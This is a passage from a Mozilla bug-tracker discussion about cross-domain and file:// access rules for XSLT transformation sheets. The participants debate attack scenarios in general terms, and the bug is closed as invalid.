to whom I ever want to send a document.  Again, not all documents are suitable
for publishing on websites -- XML is designed for document markup, not just web
publishing.

> I don't understand how any of this related to file:// URIs being 
> non-accessible from http:// URIs. Could you expand on exactly what 
> your use case is?

You've got the problem exactly reversed, actually.  I'm not trying to access a
file:// URI from an http:// URI, I'm trying to access an http:// URI from a
file:// URI.

> > Yes, but they'd be required in vastly different places -- and they'd cut down 
> > on the possibility of compromised servers being used for cross-site script
> > injection attacks.
> 
> Actually unless I really don't understand your proposal, the checks would be 
> needed in exactly the same places.

I'm saying move the checks from document-loading to scripting, since that's
where the hole originates -- maybe just set a flag when a script reads the
contents of another frame and warn if it submits a form after that happens.
> I'm not talking about hostile servers attacking a third-party site.

I am. I am talking about anything that your suggestion would expose Mozilla to.


> That's not a cookie exploit.  That's an authentication exploit

Whatever you call it, the point is we don't want to expose users to it.


> Regardless, the same exploit applies to CSS and scripts, but you don't see
> anyone getting paranoid about local CSS files being leaked.

Actually, people are. But CSS from other domains is significantly less easy to 
exploit.


> These are stylesheets we're talking about, right?

Transformation sheets, not stylesheets.


> Sensitive data isn't something one puts into a stylesheet, it's something one 
> puts into a document.

I'm just telling you the reasoning because you asked, I'm not asking you to 
agree with it (I was not involved in the decision here anyway).


> So the conclusion we're drawing here is that pages shouldn't be able to 
> examine the contents of other pages.

Which they aren't -- that's the whole point of all these cross-site scripting 
restrictions (JS from one site can't interact with the DOM of another). I 
thought you were arguing they should be?


> There's a reason innerHTML isn't in the W3 DOM.

Actually, it is (under another name, see DOM3 Load and Save); and even if it 
wasn't, it can be emulated using DOM1 Core methods.


> The thing is, checking domains doesn't guarantee safety, either.  Suppose 
> you're a low-level employee of a major corporation.  You set up an exploit in 
> your user-space on the corporate website, and send the link to your 
> supervisor; suddenly, you have access to all of your co-workers' employment 
> records and your company's trade secrets.  And checking page origin doesn't 
> stop that at all.

It's much easier than that -- just send your supervisor an executable. When the 
hostile party is trusted by the victim, the victim has already lost and 
technical solutions won't help.


> DOM-walking via iframes requires the use of innerHTML

No, it doesn't; see DOM1 Core.


> What's to stop the bank's janitor from stealing credit card
> information?  There's just no way to make it safe without verifying.

Untrusted bank employees aren't going to be given the keys to the vault.

In Web terms, and as far as internal intranet site exploits go, that's what SSL 
and authentication is for. Banks (at least banks that care about security) don't 
use cookies or any sort of persistent state for authentication, and so this 
isn't a problem. (I don't know about in the states, but here in Norway banks use 
time-sensitive electronic password generators, for instance.)


> > There have been exploits where (non-scripted, I believe) pages tricked users 
> > into submitting forms that actually targetted SMTP servers with carefully 
> > crafted content, such as to cause the servers to send e-mail (spam) on 
> > behalf of the user.
> 
> And how is this being prevented currently?  I still don't see the relevance.

It's being prevented by disallowing sites from accessing SMTP ports, a security 
measure along the lines of the measures you were describing as poor. (Actually 
sites are blocked from almost all ports except HTTP and SSL, IIRC.)


> It's not about bandwidth -- it's about interoperability.  Blocking cross-
> domain documents prevents a central information provider (W3C, Mozilla, 
> Microsoft, whatever) from being able to provide document formatting 
> information to all browsers.  What do we get instead?  Companies that adjust 
> their browsers *internally* to handle proprietary markup and attributes.

Proprietary markup and attributes should never be sent over the wire so that's 
largely irrelevant. The Content MathML case is a very particular case, one of 
the few (maybe the only) legitimate use of client-side XSLT at the moment, and 
it is only the current (hopefully temporary) situation regarding lack of native 
support that is forcing authors to use this DOM-breaking solution.


> > I hope I have explained why in fact you would be less protected than in the 
> > current system (which simply blocks all such attempts rather than only 
> > blocking those that didn't originate from user clicks).
> 
> But the current system doesn't block all such attempts.  It doesn't block
> cross-site script injection at all, and I think that's a far more severe 
> problem than inferring the contents of stylesheets.

I can't see how your description of cross-site scripting is a client-side 
problem. Wouldn't it be possible to exploit a vulnerable server without using an 
innocent user's client at all?


> > I don't understand how any of this related to file:// URIs being 
> > non-accessible from http:// URIs. Could you expand on exactly what 
> > your use case is?
> 
> You've got the problem exactly reversed, actually.  I'm not trying to access a
> file:// URI from an http:// URI, I'm trying to access an http:// URI from a
> file:// URI.

I thought we had established that that worked fine? Otherwise, I don't 
understand why in the early comments in this bug you were saying that the 
security hole was that file:// documents could access other file:// documents 
and submit their contents to the Web.


> I'm saying move the checks from document-loading to scripting, since that's
> where the hole originates -- maybe just set a flag when a script reads the
> contents of another frame and warn if it submits a form after that happens.

The practice of "tainting" data in this way is significantly more error-prone, 
significantly more costly in terms of performance, and would require 
significantly more code, than the current solution.

I am also very skeptical that this kind of exploit can only be performed via 
scripting.

I am also very skeptical, as I have said before, about prompting the user for 
issues that the user frankly doesn't know about. This would lower the overall 
security of the system, not increase it.



If accessing an http:// transformation sheet doesn't work from a file:// 
document, please file a new bug on the XSLT component requesting that it be 
allowed.

If you do not consider that XSLT documents on other domains can be exploited by 
loading them from hostile domains, then please file another new bug on the XSLT 
component requesting that it be allowed as well.

If you believe that file:// documents should not be allowed access to http:// 
documents, so as to prevent locally dropped files from sending data to remote 
servers, let me know. If this is not what this bug is about, please clarify 
exactly which exploit this bug refers to, given the comments so far.
(In reply to comment #13)
> If you believe that file:// documents should not be allowed access to http:// 
> documents, so as to prevent locally dropped files from sending data to remote 
> servers, let me know. If this is not what this bug is about, please clarify 
> exactly which exploit this bug refers to, given the comments so far.

Mostly I just don't think it's a good idea to allow javascript to transmit
information without the user's knowledge; but it sounds like disallowing that
would be impractical, so I'm just going to withdraw the bug.  Sorry for the trouble.
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → INVALID
Okie dokie. No problem!

[removing security-sensitive flag]
Group: security
Component: DOM: HTML → DOM: Core & HTML
QA Contact: ian → general
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: